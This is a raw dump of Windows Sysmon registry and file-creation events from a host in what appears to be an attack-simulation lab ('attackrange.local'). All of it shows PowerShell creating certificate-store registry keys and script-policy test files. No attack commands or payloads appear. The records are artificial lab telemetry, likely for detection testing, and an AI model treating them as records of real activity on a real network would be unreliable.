13241300x800000000000000057347122Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:18:43.810{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500_Classes\Local Settings\MuiCache\171\52C64B7E\LanguageListBinary Data 13241300x800000000000000057347121Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:18:43.810{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500_Classes\Local Settings\MuiCache\171\52C64B7E\LanguageListBinary Data 13241300x800000000000000057347120Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:18:43.810{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500_Classes\Local Settings\MuiCache\171\52C64B7E\LanguageListBinary Data 12241200x800000000000000057347119Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.737{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 11241100x800000000000000057347118Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:43.735{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_4kerl5rg.hdf.psm12021-11-12 12:18:43.735 11241100x800000000000000057347117Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:43.735{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_nz34x0fj.oc1.ps12021-11-12 12:18:43.735 12241200x800000000000000057347116Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.735{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Trust\CTLs 12241200x800000000000000057347115Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.734{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Trust\CRLs 12241200x800000000000000057347114Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.734{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Trust\Certificates 12241200x800000000000000057347113Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.734{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Trust 12241200x800000000000000057347112Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.734{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Trust 12241200x800000000000000057347111Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.734{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs 12241200x800000000000000057347110Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.734{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs 12241200x800000000000000057347109Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.734{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates 12241200x800000000000000057347108Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.734{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\trust 12241200x800000000000000057347107Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.734{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs 12241200x800000000000000057347106Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.734{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs 12241200x800000000000000057347105Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.734{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates 12241200x800000000000000057347104Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.734{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\trust 12241200x800000000000000057347103Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.734{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\trust 12241200x800000000000000057347102Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.734{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs 12241200x800000000000000057347101Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.734{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs 12241200x800000000000000057347100Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.734{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates 12241200x800000000000000057347099Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.734{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\trust 12241200x800000000000000057347098Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.734{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs 12241200x800000000000000057347097Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.734{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs 12241200x800000000000000057347096Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.734{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates 12241200x800000000000000057347095Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.734{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\trust 12241200x800000000000000057347094Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.734{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\trust 12241200x800000000000000057347093Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.734{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\TrustedPeople\CTLs 12241200x800000000000000057347092Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.734{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\TrustedPeople\CRLs 12241200x800000000000000057347091Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.733{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\TrustedPeople\Certificates 12241200x800000000000000057347090Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.733{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\TrustedPeople 12241200x800000000000000057347089Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.733{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\TrustedPeople 12241200x800000000000000057347088Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.733{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs 12241200x800000000000000057347087Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.733{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs 12241200x800000000000000057347086Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.733{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates 12241200x800000000000000057347085Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.733{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople 12241200x800000000000000057347084Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.733{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs 12241200x800000000000000057347083Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.733{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs 12241200x800000000000000057347082Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.733{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates 12241200x800000000000000057347081Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.733{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople 12241200x800000000000000057347080Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.733{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople 12241200x800000000000000057347079Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.733{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs 12241200x800000000000000057347078Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.733{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs 12241200x800000000000000057347077Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.733{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates 12241200x800000000000000057347076Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.733{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople 12241200x800000000000000057347075Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.733{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs 12241200x800000000000000057347074Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.733{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs 12241200x800000000000000057347073Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.733{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates 12241200x800000000000000057347072Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.733{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople 12241200x800000000000000057347071Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.733{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople 12241200x800000000000000057347070Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.733{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs 12241200x800000000000000057347069Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.733{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs 12241200x800000000000000057347068Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.733{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates 12241200x800000000000000057347067Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.733{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot 12241200x800000000000000057347066Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.732{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs 12241200x800000000000000057347065Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.732{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs 12241200x800000000000000057347064Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.732{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates 12241200x800000000000000057347063Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.732{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot 12241200x800000000000000057347062Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.732{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Root\CTLs 12241200x800000000000000057347061Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.732{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Root\CRLs 12241200x800000000000000057347060Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.732{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates 12241200x800000000000000057347059Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.732{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Root 12241200x800000000000000057347058Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.732{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Root 12241200x800000000000000057347057Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.732{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Root\CTLs 12241200x800000000000000057347056Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.732{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Root\CRLs 12241200x800000000000000057347055Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.732{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Root\Certificates 12241200x800000000000000057347054Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.732{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Root 12241200x800000000000000057347053Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.732{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\CTLs 12241200x800000000000000057347052Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.732{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\CRLs 12241200x800000000000000057347051Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.731{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates 12241200x800000000000000057347050Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.731{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot 12241200x800000000000000057347049Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.731{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\CTLs 12241200x800000000000000057347048Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.731{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\CRLs 12241200x800000000000000057347047Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.731{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates 12241200x800000000000000057347046Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.731{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT 12241200x800000000000000057347045Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.731{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT 12241200x800000000000000057347044Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.731{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs 12241200x800000000000000057347043Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.731{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs 12241200x800000000000000057347042Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.730{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates 12241200x800000000000000057347041Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.730{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\Root 12241200x800000000000000057347040Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.730{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\Root 12241200x800000000000000057347039Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.730{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x800000000000000057347038Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.730{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x800000000000000057347037Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.730{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x800000000000000057347036Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.730{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 